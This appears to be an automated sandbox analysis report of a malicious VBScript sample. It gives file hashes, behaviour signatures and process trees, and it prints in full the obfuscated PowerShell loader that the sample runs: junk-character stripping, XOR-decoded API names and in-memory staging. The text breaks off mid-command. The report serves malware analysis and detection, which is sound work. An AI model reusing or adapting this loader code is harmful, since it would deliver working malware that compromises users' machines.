65562be31d12a17b584e23153058611a497ac42e84595491afcede927e45cd0f

General

Target

0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f.vbs
Size

642KB
MD5

791f78299b068e26b702b1b0c54c0417
SHA1

461c4a70f8a083e3565816161eeaabd1bdaf6592
SHA256

0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f
SHA512

3826229f02637b703440f8f51856ab61ee515a28902777ec505d92603a3a752361f0c0d6223f51c30b4a5484de65cb3b08f414ba38c41a0d3b31738d97e7b8a2
SSDEEP

12288:zt9mMykiZo+FxNsUV7oBvwQzpBKtPN/B9AzZHDl:znutoxNTMx8zZHZ

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1992	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1696	powershell.exe
1516	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 1696	1992	WScript.exe	28
PID 1992 wrote to memory of 1696	1992	WScript.exe	28
PID 1992 wrote to memory of 1696	1992	WScript.exe	28
PID 1696 wrote to memory of 1516	1696	powershell.exe	30
PID 1696 wrote to memory of 1516	1696	powershell.exe	30
PID 1696 wrote to memory of 1516	1696	powershell.exe	30
PID 1696 wrote to memory of 1516	1696	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Togets = """MFUu nBc t i o n CK e l t insTk 0 V{I l PpraMr aDmP( [PS tUr iEn g ]A`$RRTeSjAe hUo p pMeUnCeMsS) ;F G S`$ KSuclAtAuGrBa k t i vPiMt eVt s =B N eSwU- O b jPeAc tC AbCyKtMe [O]C ( `$FRAeRj elhPoLpSp eSn eus .FL eUnTg tFh / 2 )K;b O T F oPrH( `$ PTaSc hEy dLeGrMm a t oIuBsOlSyA=B0 ; S`$SPua c hUyRdGe rAmSaPt o u s ldyR - l tk `$MRBeTjPeShNoEpPpCesngeEs . L eZnTg tTh ;S `$ P a c hSyRd eVrFm a tCoSuUsSl yM+ =k2B) {M H L`$sPTe r i e s oPpSh aPg eSa lT N= K`$ RBeCjLeCh oEp poeIn eSs .DS uDb s t rSiRn gD(C`$TPBa cBhMyCdCeAr mTaMtQo uPsKl y ,s D2O)M;T R E S M h C `$ K uPl t u rUaFk t iSv i tCe t sC[G`$ PPaTcCh y dVeBrCm aUtPo uSsWlTy /Y2S] K=B D[ cmo nBv e r tF]R: :CTUo BGyBtReO( `$ PMe r iFe sso p h aAgie aSlH, 1R6T)K; L`$tKguHlMt uArSa k t iHvHiHt eCths [ `$SPaa c hUy dPe rDmHa tCoTu s lBy /K2S] s=D Z(U`$SKTuMl t uArPa kKt itvTi t eStSs [P`$sPUaAcOh y dbe r m a tSoCuDsRl y / 2K] - b xMoErC M1R9K7B)b;H J T C }A T[DSEt rui n g ] [uS yDsCt eUm .GTVeSxFtS.HE nDc oPdBiMn gF]E: : ASSTCII IE.TGBeGtUSBtKrNiRnPgU(N`$FKSu lZtOuFrFaBkStKiGvFiItGeGt sP) ; } `$ePFuDrOiHv sEiOgWtHe 0I=dK eElTtBiIsIk 0 'B9C6KBCC BC6HB 1 A 0 AA8PESB As1 AA9FAK9 'm; `$AP u rAiPvOsPiPgbtKeA1p=AK esl tGiPsbkM0 H'M8S8FA C Ab6fB 7MAHARB 6PABAKAC3 BA1 E B 9 2AArCLATB Fc6HF 7ME Ba9 0IA BpBN6 AO4SA 3tAK0P8UB A 4 BA1PAaC BM3KAT0 8 8AA 0 Bu1DABDSAVA AR1eB 6C'L; `$EP uWr iSv sPi gUtAeD2C=TKSe l tRiUsIk 0 F'k8U2 Ab0NBR1t9J5CB 7UAHA Ap6s8V4 A 1 AL1 B 7KAR0 B 6 BT6T' ; `$ P uTr iMvUsJiCgWt eU3 = K e lStSi s kS0T C'T9B6IBCC B 6 BW1MA 0 A 8SEKBK9 7TBC0EA B BV1VA C AI8 AC0EEAB 8BC AfB Bs1TAO0SB 7SApATB 5 9 6GA 0ABg7 B 3 ALCSAD6IA 0 B 6IE B 8 D A 4SAkBAAG1QAc9TAN0P9B7 AB0TAC3 ' ;T`$ POu r i v s isgBtWe 4 = K e lMt iEsPk 0U 'CB 6TBC1PB 7NA CSAtB A 2C' ;R`$FPIu rsiMv s iIg t eR5T=TKSeSlTtFiDsFkF0S 'A8 2 A 0SBP1B8 8GApAAA 1 B 0 A 9BA 0 8KDFAn4HA B AP1HA 9 AF0 'K;S`$ PMuArLi v sWi gKt eD6 =SKBe l tPiKsSkM0 'F9 7D9S1 9P6 BR5RA 0 A 6PA C AS4 A 9 8 BSA 4LAG8SAE0PES9 ES5 8HDTA C AP1 AS0C8 7SBVCO9U6 A C AA2 EA9 EF5M9I5 BB0 A 7 AP9BABC A 6 'T; `$ P uarHiUvOsPi g t e 7K= K eBlGtsiSshkT0D 'T9k7KB 0GA B BK1 A C AG8AAL0LE 9SE 5 8J8DA 4 AVB A 4SAT2PAI0SA 1 'M;U`$ PMuhr i vRsDiggHtFe 8R=IKPe lCtSi skk 0S Y'W9S7 A 0DAL3 AK9OAF0NAN6ABD1 AF0 A 1U8D1tAG0 A 9 AR0KA 2MA 4SBH1UAS0A'R;s`$ZPHuSrDiSvPsDiSgMt eR9 =NKTe lFt i s kc0 L'B8LCWA BF8o8 AS0LA 8DAHAUBT7 B C 8 8CARA AF1OB 0PAJ9HA 0 ' ; `$ A pCo lFo gCyA0B= KUe lTtTi sTk 0T ' 8o8 B C 8T1KA 0nAH9NAO0 AD2SAP4DB 1TAC0A9L1KBUCOBA5 A 0r'F;A`$ A pAo lDoFgHy 1 =GKDe l tNiKsMkT0S 'D8 6 AU9RAd4 B 6 B 6 E 9REF5K9 5 BU0 A 7MA 9NAACSAM6MES9OE 5 9R6 A 0SAO4 A 9VA 0 AR1FEA9 ET5T8H4SAsBIB 6 AACP8 6 A 9 A 4 BA6OBP6aEg9 ED5P8P4 B 0BBC1SAPAG8 6PA 9 AT4ABb6KB 6T' ;A`$PA pDoAl oHgIy 2 =LK e l tHi sAk 0B T' 8DC A BBBA3 AFACA EiAC0 'L;s`$RA plo lWoFgSy 3B= K eDlBt i sfk 0P 'I9a5 B 0FAE7 A 9BAVC A 6tEM9 E 5 8MD ASCPA 1RAA0 8s7ABKC 9M6 A C AE2 E 9 ES5L8UB AU0 B 2K9S6GAO9 A A Bk1 E 9NE 5A9K3 A CCBB7KBV1BB 0CAJ4 AR9W'P;b`$AA pSoZlFo gSyu4F=SKUeSlGtHi sPkO0 'R9F3DA CNBk7 BL1IBC0HAI4TAA9S8K4IAG9 A 9MAUA A 6P'O;R`$FA p o l o gPy 5 =WKBeDlAtRiFs k 0P 'GAABTB 1 AM1IA 9PAT9B't;R`$HAMpRoHlSo gTy 6 =SKPe l tDi svk 0O t' 8TBmB 1 9P5 BF7 A A BS1FA 0CA 6aB 1S9U3CA CCBT7 B 1 B 0NAW4FA 9T8S8 Am0EA 8UAKASBT7TBSCB' ;F`$ ARp oClRo gBy 7 = K e lStLiLslku0c P'S8 CC8P0 9 D 'A; `$ Alp oNlFo g yL8t=AKBe lAtAiBs kK0 ' 9A9 'I;S`$ CSaPr i nTuPlRaDtGe =RK eBlTtSiasFk 0E C'N9 0K9 6I8 0 9 7 FJ6NFT7 'F; `$ J e r oLpSi gCaN=PKSeVlItri sBkV0 ' 8U6VA 4LAP9UA 9 9 2LACCyACBDA 1HANABB 2F9 5LBD7NA A AP6a8K4 'S;gfUuRnbc t iSo n Ff kIpT P{HP a r a mH T(N`$ EEn dUaRnBg eHrYsG,M `$ M iBnKiCo nClAyC) H P S F ;V`$sF iBrFmFaLf lKa sAkFehr 0E =eK eSl tSiMsAkT0J M'BEP1SABEKA A ALB AA6 A CBBD5 A 0RBp7 ATCSADB AM2 Ag0 A BSBv6NE 5 F 8 Em5 E DF9 E 8O4SB 5EB 5E8 1UA ABAE8 AS4 ACC A B 9B8DFPF FKFT8P6 BE0 B 7 BM7sAB0LA B BF1 8 1 APApAA8FAO4CAICgABB EpB 8K2CAC0aB 1F8U4 B 6FB 6 AS0OAs8dAK7AA 9 ABCMAS0AB 6TEFD EBC ED5ABF9 EF5 9R2 ASD A 0NB 7 AS0SEP8 8RA AF7 A F A 0NA 6IB 1PE 5 BFEEE 5TE 1 9 A E BG8 2NAB9 ABA AU7 A 4 Ai9F8I4 BS6FB 6 A 0 A 8MAC7SAG9UB C 8 6TAf4SA 6 ADD A 0CER5BEa8J8E4BATBFAR1AES5TEJ1P9YAOEFB 8H9 ATA AB6 A 4 BD1FAGCAAPA A B ETBD9D6 BS5 AA9FA CABv1AE D EU1 8 4IBA5 A A AC9UABAMA 2NB C FLDSE CE9 EGE 8WFt4 9 8 E BS8 0 B 4AB 0WAB4 A 9SBA6AEBD EO1 9c5 Be0 Bt7SAgCABH3DBD6 A CAAT2tBK1TA 0WFD5 EUCSET5PBD8BEFCRE Br8M2iAS0 B 1 9 1 B CABD5HAA0EEtDEEU1c9N5VBU0CBS7AASC Bk3 BS6 ASCNAI2 BA1 AK0 F 4RESCE'N; &A(T`$ AdpCo l oVgDy 7 )S `$ F i r m a fRl aKsEkBe r 0 ;S`$ F iUrRm a fSl aTs kseVrL5 =H SKTeEl t iUsRkT0 ' EA1L8TDSAN4EBT1BA 6PA D E 5SF 8 EC5VE 1 AUEDACAFAIB AS6TA CFBM5 AH0OB 7 ABCeAWBDAe2HAT0 A B Bm6KETBS8 2TAc0 BK1 8O8 AT0UBs1iA D A APAA1 E D EQ1B9C5 BK0 BD7BA C BV3 BK6 A CFAA2LBF1 AV0HFN7UEP9 E 5N9SEV9 1 B C BS5FA 0 9 ET9U8 9B8LE 5 8c5 ERDAEU1Y9 5 B 0 BF7 AHC B 3RB 6UASCCA 2NBG1 AG0 FF6 E 9 Eu5 EK1l9 5 B 0 BP7WA CNBP3RBR6 A CBAU2 B 1LAp0sFT1SEqCEE C 'R;c& (I`$TAep oVlBoPg y 7 ) l`$ FSi r m aFfhl a sAkBe r 5 ;s`$ FPi rTmGa f lAa sBk e r 1S G=C TKBe lUt i s k 0S A'LBD7KAD0 B 1MB 0PB 7AA BDEU5 Eb1 8KDVA 4PB 1EA 6lA D EMBU8ECMA BFBA3NARAaASESAS0 E D Eu1pApB B 0AA 9UAO9AEO9 EH5f8 5TE DL9AEE9S6DB CBB 6RBV1PAS0 Am8nEmB 9 7 BR0FA B BR1 ACCbA 8 A 0LEAB 8nC AVB B 1rAK0SB 7CAUASB 5P9 6 A 0 B 7MB 3DABCUA 6 A 0 BP6 EKBS8HD AS4PA B A 1OA 9 AR0 9I7 AI0NA 3S9R8 E Ds8 BEAE0 B 2 E 8 8UA AE7cA F At0SA 6 BS1 E 5U9U6tBVC B 6FBD1RAS0IAP8HETB 9 7nBM0GA BHBS1 APC AS8PAO0 E B 8 CkA B BF1 AU0TBP7CAGA BL5I9m6 AB0 B 7 BE3JA CBAL6FA 0FB 6 E BS8 DUA 4EAaBUA 1FAV9MAF0S9T7 Ao0 A 3 EAD EpDP8BBRAO0ABg2 EK8 8NASAA7EA FPAE0CA 6 BA1 E 5H8TClAPBFB 1 9 5SBP1SB 7 EsCFE 9LEO5VEaD EM1RAHEDASAFANB A 6IASC BB5SA 0 Bd7EAGCDADB A 2oAM0DARBTB 6 E B 8 2 AC0 BM1M8M8 AH0mBT1TASDnA AHAB1PE D E 1P9F5RB 0RB 7SA CPBE3VBN6 A C AB2 BS1BA 0 F 0 E CCESC EOB 8SC ASBPB 3MA A APEaA 0TE D ES1 ARBRB 0ZAH9 AB9 EE9RE 5F8 5GETD EP1H8P0CAGB AU1 A 4OASB A 2 AU0SBM7AB 6MEHCSE C EuCEE CCEE9LEN5REI1V8A8 A CSA B A CBAFA A BPAS9SBNCKE CSEOCt'c;C& (U`$ AKpBoAlaoNg yC7 )L A`$ FPiBrdmhaSfIlPa s kTeBr 1O; }Pf uUn cLt iMoFnH GeDNTW { PGa r a m (S[EP aIrBaIm eUt e r ( P oMsHiPt iEoWnU G= 0V,R EMFaKn dlaZtVoSr yS B=R `$ TCrSuFeK)S]S L[HTAyRp eF[D] ] I`$IFMoMrUeBhBoSo kP,Y[ P aArKaWmPe trePr (SPRoVsUi t iAoTn S=S 1B)d]A U[hT y pNeT]M `$SEAk sTpHoSs e e r = A[ VMoAi d ] )V; `$NFDi rUmEaAfSlcaSsRkLeDr 2C =G K eAl tFi sUk 0 'NES1 8 4TA 3 B 6bB 1KAKCEBP3TALBIA C ASBBA 2IBC6 B 1RA 8MA 8 AH0VB 7OBC6 EE5HFR8lEC5 9AE 8 4 BM5 BD5 8k1 AsABAF8 Ab4uA C AHB 9p8 FDFVFaF 8 6fBH0wBS7 BA7GAt0 A BEBB1L8O1AAUA A 8UAA4SADC A B EPBD8 1 A 0TAW3 A C A B AB0c8 1 BPC AHBSAG4 AB8ZA C AF6d8D4 BS6TBS6RA 0 Ah8 AC7FA 9 BHCuEKD ESDN8 BKAE0SBP2CE 8B8AA AD7SAFFRAZ0BAS6IBB1 EK5E9 6 BpC B 6MB 1sA 0SA 8PETBO9 7FAN0 A 3 A 9 AW0AA 6HBS1 A C A A ASBDE B 8H4SBD6JBB6 A 0 AL8 Ao7 A 9MBECA8HB AP4DAE8FA 0 E DvER1U9k5 B 0DBU7 A C B 3 B 6 A CHAf2TBm1PA 0sFMD E C E CSEL9fE 5B9CE 9S6iBSC BD6SBR1 A 0PAJ8KE BE9L7 AL0 AM3FAA9UA 0SAP6 B 1 ALC ASA APBCELBp8E0 AM8WA C B 1 E B 8C4 BO6 BA6 A 0IAc8SA 7 AC9TBPCF8J7 B 0 AAC AK9 AT1UAK0FB 7 8 4 AC6FA 6 Av0TB 6 BW6 9N8 FLFGF F 9S7EBC0 APBREOCbEcB 8 1RAF0 AS3RAMCKA BPAS0C8 1SBTCCAFB A 4 AM8SAPC AA6 8 8TA ABAV1KBT0 A 9xAT0IEID E 1S9 5 BS0 BE7 ASCMBT3 B 6CACC A 2SBA1FAH0 FMC E 9GEV5AE 1 A 3BAD4hAU9 BK6SA 0 ETCRE B 8S1 AU0CA 3PAGCIAKB AT0C9 1ABACCBh5 AD0PE D E 1T8s4 B 5 ADASAB9IAKAEA 2ABNCmFF5CEC9JEI5 EH1 8 4SBM5BAGA A 9TA A A 2KBiCSF 4 E 9HE 5 9SE 9G6 BTC B 6ABO1sAT0FAD8 ECB 8 8 BN0FAP9SB 1MATCDAM6tAI4TBV6TBC1S8D1 A 0CAE9bAS0 AR2 A 4 BK1MAT0 9D8 ESCA' ;P& ( `$BATpPoIl oOgBy 7 )B U`$PFAiJr m aBfBlMa sUkKeFrF2 ; `$VF iSr meaffFlKa s kEehr 3 G=A K eIl tUiUs kT0 ' Ef1U8R4gA 3SBP6SB 1OA C BT3TALBTA C ASBUAM2BB 6CBM1 A 8 A 8SAU0RB 7 BP6DEKB 8S1AAF0TAA3IA CBANBLAS0K8 6GA A AVBBBN6 BS1 BL7MB 0CA 6fBI1OANADBC7 EFDCEs1 9 5RBS0 BS7MA CLBS3LBS6bAICGAS2UB 1 A 0BF 3 EN9JEA5P9 EF9 6TBcCAB 6 B 1PAs0 AG8RE B 9 7RAD0 AK3 A 9 Ae0 AI6FBR1CACCBAFALAPB E BT8O6 AB4 A 9 AR9 ASC ARB AS2T8S6GA AEAVBDBF3NA 0 APBIB 1 AVC A ASA B BF6s9 8CFFFEFTFH9F6 BB1kAA4HAUBCAT1GA 4PBK7BA 1IEs9REJ5 ES1S8S3 A A BS7tA 0KA D A AFATA AGEBEWCSEPBM9 6 AL0 B 1L8DC A 8IB 5UAL9DA 0NAD8TAT0FA B B 1WAS4DB 1VAUC AMASASBW8B3 AA9 A 4MAU2OBS6 E D E 1p9 5ABV0UBF7PATCEBT3FB 6RASC A 2EBM1 AS0 F 2AE C ' ; &L(F`$PACpeoPlmo gPy 7C)S `$ Fsi rIm aSfElNaRsHkReAr 3S;R`$HFSiRrAmIa f l a s k eMr 4D =L pK e lKtTiGsSkN0 G'ME 1A8C4 AI3GB 6KBP1FAFCOBK3MABBSA CAA B AR2tBV6 BV1SA 8 AA8NA 0 B 7PBf6 EPBS8S1SA 0 AE3SAJC AiBCAP0C8 8CA 0OBB1SAJD AsA AU1LE DpEC1F8 4FBa5 ABAeAK9DA ABAM2 B C FF7bES9AE 5 E 1K8 4TB 5 AMABAH9CA A A 2fB CCF 6 E 9GE 5UER1D8p0UA E B 6MBR5NAUA B 6IAM0 A 0TBA7IE 9 EA5fEF1 8A3RA AbBS7DAU0CA D AEAMA ASAUEGE C E Bc9R6BAG0mB 1I8 C AU8IBB5 AA9IAK0SAE8SA 0AAtB B 1TA 4 B 1FAACIA ALAbB 8 3VA 9SA 4SAR2TBh6 ETDRE 1K9S5DBG0RB 7KA C BK3UBE6 AFC A 2DB 1SA 0DFO2vE C 'U; &t(S`$ Agp oSlso gSy 7 ) `$RF i rSm a fBlFaCsRk e rA4 ;H`$ FAi rBmGaCf lAa s kCe r 5 P=U GKPeSlDtAiOs kM0 N'BBh7TAa0 BV1 BR0 B 7 AsBtE 5PES1 8 4 Ab3DBT6KB 1 AaCSBR3 A BLAPCLAABEA 2aB 6BB 1PA 8 AI8SAm0 BE7SB 6 ESBN8S6 B 7 AS0BAP4SBB1AAV0G9 1 BBC Br5SAL0CEPDpE C 'M;L&H(C`$ A pTo lGoVg yC7F) `$KFbiSrSmUaTfAl aRs kHeprJ5 I;S} `$TA uetVoUnSoRm iUsKe rGeUt S=S FKDeOl tdims kA0 ' A EBAB0 Ba7sA B AS0KAK9 Fd6 FM7 ' ;F`$LF i rRmAagf l aUsbk eSr 6A G= SK eBl tDiDs k 0 'NES1 9U1NAc4 AG9 AA0 B 1 ASCQAP1UAB0 AABTBF6PEX5BFC8OE 5 9 EK9 6RBHCEBC6 B 1dAR0TAP8FE Bu9P7IB 0EA BcB 1AA CuAT8FAH0REBB 8cC ADB BB1TA 0 BG7 A A BL5b9P6SAM0 B 7sB 3eA CEA 6SAP0PBt6 E B 8A8 AS4UB 7AB 6 A DhAI4UAF9E9 8 FBFrFBFR8 2 AD0mBh1 8P1 AN0 AA9TA 0RA 2RAN4SBE1BAP0w8C3FA ABB 7E8E3GBB0TA BlA 6IBA1 A CKAFA A BJ9 5 A ANAEC AEB BK1HAU0SBF7SEBDTEwDUA 3BARE B 5 E 5tE 1 8F4 B 0 B 1TARA AFB AOARAD8DAsC BT6CAE0 B 7AAA0LBP1CEB5 EF1m8S4 BS5 ACASA 9VA A A 2HBCCUFF1UE CCE 9 EB5 ELD 8T2L8 1 9 1MEG5M8P5 E D 9sE 8 C APB BU1J9F5PB 1DB 7G9 8 E 9MES5 9SE 9 0C8 CHA BBBU1SF 6FFV7B9Z8hE 9aE 5R9DEP9O0 8TC ADBPBE1SFW6 F 7 9w8ME 9 E 5 9UEF9 0 8fC ABBRB 1SFR6 FV7F9 8 ELCOEE5VELD 9sET8 CBACB B 1F9 5BBU1 Bc7 9B8 E CBELC E CB' ; & (M`$ A pPo lfo gFyS7d) G`$GF iKrFmLa fMlUaFs k eerO6U;F`$ SGk nSnFecs t eK =Y SfPk p N`$BAPp oSl oBgUyB5k S`$UA p o l oMgFyM6 ;D`$yFFi r mAaSfTlMa sZkSeNr 7 F=K FKKeKl t iSsIkU0K S' E 1 9 6MAS6PBk0 AO9BBE5 Bd1 BT0PBS7OA 0sB 6RB 4 BA0 Ak0DA 9 BRCSF 6KEk5 F 8UEP5HEN1R9 1 AN4HAA9DA 0 B 1 ATCBAR1 A 0 AkBCBP6 E B 8GC AUBBBS3 A AfAAESAE0OE DP9 ED8aC AHB BH1H9 5 BB1PB 7B9S8oFdFSF F 9 F A 0AB 7FABA E 9 ET5KF 3 F 0 FP1 ES9SEO5 Fd5BB D FG6AFP5 FV5 Fs5SEj9 ES5 F 5IB DFFI1 F 5SE CC' ; &R(A`$AAEpFoml oIgPyI7P)h `$TF iArCmTa fSlOaFsBkBe rK7A; `$ FTiOrmmBa f lPaAsCkbe r 8C O=N BKHe l t iRsPk 0 M'RE 1 8P7 A AEB 1TA 4SARBNAAC BR6 A 0sB 6RED5VFT8GE 5OE 1P9 1AAB4 A 9 AR0 BT1NAKC AP1 A 0 ApBSBR6 E B 8sCSA BgB 3 APADA ETAN0 E DM9SET8 C ARBFB 1K9S5TB 1IB 7 9T8 FaFSFNFS9SFcAA0HB 7CA ATES9CEa5SFJD FU1 F DBFPCCF 6UFB3MF C FA3 EA9ME 5BFT5 B DPF 6 F 5FFR5dFd5 E 9KE 5dFC5 BsD FP1bE C ' ;B&R( `$ AFpLoSlKo gEyD7 )n T`$PFRi rPmsaGfRl aTsCk eTr 8L; `$pS c uDl pBt u rGe s q uKeIl y 0E0F=V' H KjC U : \FA d eHsUtDeT\RSFa lKtLeCtNs 'H;M`$ SQcOuSlIpOt u r eIsLqTuIe l yH0 1U C= K e lRt iCsPk 0 K'SES1G9A6 BF0CA 9 BL1 AS0 B 6ABO1 BD7SAs0UA FOA ENAS0 BF7 A BPA 0FFS8NEdD 8 2PAS0SBC1AED8 8 CFBO1 AI0 A 8 9 5 BA7PASAIB 5lA 0SBB7 B 1 BACSE 5PEL8A9 5 AM4FBg1iA DRE 5 E 1 9B6OAm6KBK0 AU9 B 5 B 1 BT0HBS7 A 0EBS6BBB4 Bh0AAK0KA 9PB CDF 5 FK5 EmC EBBA8S0AAA3oBP1LA 0UB 7 BM0 A 1 AB1TA 4 AHB ATB AB0O'F; &H(U`$ AHpUo l oWgsyG7S) `$ STc uklspPt uMr eMsOq uEeLl y 0 1 ;A`$ FFi r m aPf lTa s kSeNrL9R =U KOe lPtKi s kR0O A'RES1N8N3HA CDBL7FAU8 AV4 AE3 AD9 A 4 BI6 A EAAP0 BR7 EF5SF 8 E 5T9PEB9 6 BKCABK6MBU1RA 0 A 8 E Bd8 6KAdASAKBSB 3 A 0SB 7 BR1D9A8HFKFSFKFC8m3BBD7BAPAeAi8 8E7 A 4 B 6sA 0 FA3CFS1 9O6 BH1 BB7 AKC ANB AF2LE D E 1O9s6 BU0 A 9PBv1 A 0FBM6 BB1TB 7EA 0 ABF ACE AT0KBS7 AoBKA 0 ECCE'P; & ( `$ A p oYlTodgSy 7M)P C`$ F iIrUmCaAfSlBa sRk eCrL9U; `$ SSu l t eEsCt rFe jAkUe rOn eT0M F=M RK eFlCt i sSk 0U k'B9UEL9 6BB C B 6DBD1aA 0fAC8AETBC9 7SBF0PA BUB 1DAAC AH8SAB0 E BD8SCKA BdBD1cA 0UBH7TAPAsBP5P9 6 AI0UBS7 BF3TAUCMA 6HA 0DB 6BEDBL8e8 AD4DB 7LBB6HAUDSA 4FAE9R9 8 FUF FVFF8 6CA AIBD5SB CHE D ES1 8S3SA C B 7CAA8SAA4PA 3 A 9WAC4AB 6pA E A 0HB 7SE 9 ES5 FZ5GEF9 E 5 ED5 EZ1 9S6TA 6 BC0UA 9 B 5ABU1RB 0 B 7 A 0KBD6EB 4CBl0 AS0 AR9UBMC FP6GE 9PEs5BF 3oF 0GFR1SEECD'L; &g(I`$ A pSoMl o g yU7 ) p`$NS uSlDtMe sUt rCeHjLkEeErrnDeU0D; `$CAPpOoelBoAgLiSzfenrA=P`$JF iMr mSa fHlGaMs kPe r . c oBuGn tb- 6 5r4K;P`$FSFuMl tTeUsCtNrDeMjVkBeRr n e 1V S=O SKpeAl t iCs kA0F 'f9 EP9T6 B CHBU6 Bo1 AM0 AF8FELBR9 7 B 0EAeBEB 1FASCSA 8 AC0aEBBr8FCBAPB BL1 AM0 BO7SABA B 5D9S6 A 0SB 7 BT3 A CiAO6 A 0 BS6DE B 8 8HAs4SBA7PBS6HA DsAK4SA 9B9 8NFFFKFXF 8 6BADA B 5 BeCBESDHES1C8B3dARCCB 7 Al8HA 4 AM3 A 9MAU4pB 6TA EkAh0 B 7 E 9HEU5 FI3DFD0SFD1REB9 EI5VEM1 8 7MA ATB 1VA 4GASB A CSBG6RAp0 B 6 EA9sE 5GE 1H8S4BB 5 AFADAT9SALAsAN2FACC BTF AD0JB 7CEECB'S;K& (c`$ A pMoPlAo gUyB7G)D a`$LSRuNlCtFe sDt rVe j k e r nCeN1 ; `$ SHu lgtMe s tRrPeRjEkBe rHn e 2e M=B KTeGlAt iFsRk 0 B'KE 1M8F4 B 6 BLC AF8 B 5 B 1aAPA Bd1 AK0 A BABM6 E 5SF 8 EB5 9UE 9 6fBPC B 6LBO1 AM0KAP8 EDB 9U7GBP0KA BFB 1 A CRAJ8tA 0 ELBS8DC AOB BC1IAH0 BE7aADAUBL5 9 6 AK0AB 7 BH3RA C At6WAT0 B 6FEABf8P8 A 4 BF7 BB6kABD AS4UA 9 9 8BFjF FVFA8Q2KAz0BB 1V8 1 AE0PAC9SAD0 AV2 A 4 Bf1 AR0 8 3FA AMB 7 8S3HB 0BAFBSA 6OBP1 AUC A A AFBS9A5 AMA AsCEASBPBl1iA 0LBS7 EGD E DFAA3 AgEBBD5 E 5ME 1 8 6IAi4 B 7WASC AHBBBB0 AG9DAT4CB 1PA 0OEF5 EC1W8 F AP0OBE7 A A B 5UA C Au2 A 4MERCTES9CED5 E DG8 2G8B1L9 1PE 5 8 5 E DN9 EB8TCSA B BN1P9P5SBB1CBK7D9 8EE 9 EE5 9EEK8MC AVBBBB1C9 5 BS1PB 7F9 8 EA9oES5 9BE 8 CFA BEBb1 9 5bB 1 BU7P9V8mE 9 EV5C9HE 8UC A BMB 1 9C5UBK1BB 7 9G8TE 9AE 5b9 E 8SC ASB B 1S9S5zB 1 Bp7 9 8 E CMEC5HE DI9 ES8NC A BVBH1P9T5 B 1 B 7P9 8FE CNELCsEVCh'g; &h( `$aASpQoRlZoNgByT7 )c O`$ SSu lFtRe sFt r e jFkAeTrcnMeK2P;K`$SSPuNl tre s tBr e jSkIeErEnVeU3L = KSeWl t iKs kS0H P'SE 1P8N4 B 6TBDCUA 8UBS5 BS1 A A B 1HA 0GATB BE6PETBH8 C A B BP3KA AAACECAF0 EsDFES1 9F6 AG6SB 0FAu9 B 5 Bm1ABF0FB 7UAc0RBC6oB 4 B 0 AG0MAC9UB CUF 6fE 9SE 1A8 7BAMABB 1SAs4 A BPAsC BU6 AR0VBL6UEA9 EV1 9D6 A E ACBAASBFAM0rBB6LBB1SAE0 ED9MFD5NE 9GFu5 E CJ' ;A&i( `$oARpBoSlpoGgsy 7 ) `$mS u l t e sDt rSepj k e r n eT3 #G;""";;Function Sultestrejkerne9 { param([String]$Rejehoppenes); For($Pachydermatously=1; $Pachydermatously -lt $Rejehoppenes.Length-1; $Pachydermatously+=(1+1)){ $Keltisk = $Keltisk + $Rejehoppenes.Substring($Pachydermatously, 1); } $Keltisk;}$Manak0 = Sultestrejkerne9 'L A F V S t T B G I EBX ';$Manak1= Sultestrejkerne9 $Togets;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Manak1 ;}else{.$Manak0 $Manak1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Keltisk0 { param([String]$Rejehoppenes); $Kulturaktivitets = New-Object byte[] ($Rejehoppenes.Length / 2); For($Pachydermatously=0; $Pachydermatously -lt $Rejehoppenes.Length; $Pachydermatously+=2){ $Periesophageal = $Rejehoppenes.Substring($Pachydermatously, 2); $Kulturaktivitets[$Pachydermatously/2] = [convert]::ToByte($Periesophageal, 16); $Kulturaktivitets[$Pachydermatously/2] = ($Kulturaktivitets[$Pachydermatously/2] -bxor 197); } [String][System.Text.Encoding]::ASCII.GetString($Kulturaktivitets);}$Purivsigte0=Keltisk0 '96BCB6B1A0A8EBA1A9A9';$Purivsigte1=Keltisk0 '88ACA6B7AAB6AAA3B1EB92ACABF6F7EB90ABB6A4A3A08BA4B1ACB3A088A0B1ADAAA1B6';$Purivsigte2=Keltisk0 '82A0B195B7AAA684A1A1B7A0B6B6';$Purivsigte3=Keltisk0 '96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB8DA4ABA1A9A097A0A3';$Purivsigte4=Keltisk0 'B6B1B7ACABA2';$Purivsigte5=Keltisk0 '82A0B188AAA1B0A9A08DA4ABA1A9A0';$Purivsigte6=Keltisk0 '979196B5A0A6ACA4A98BA4A8A0E9E58DACA1A087BC96ACA2E9E595B0A7A9ACA6';$Purivsigte7=Keltisk0 '97B0ABB1ACA8A0E9E588A4ABA4A2A0A1';$Purivsigte8=Keltisk0 '97A0A3A9A0A6B1A0A181A0A9A0A2A4B1A0';$Purivsigte9=Keltisk0 '8CAB88A0A8AAB7BC88AAA1B0A9A0';$Apology0=Keltisk0 '88BC81A0A9A0A2A4B1A091BCB5A0';$Apology1=Keltisk0 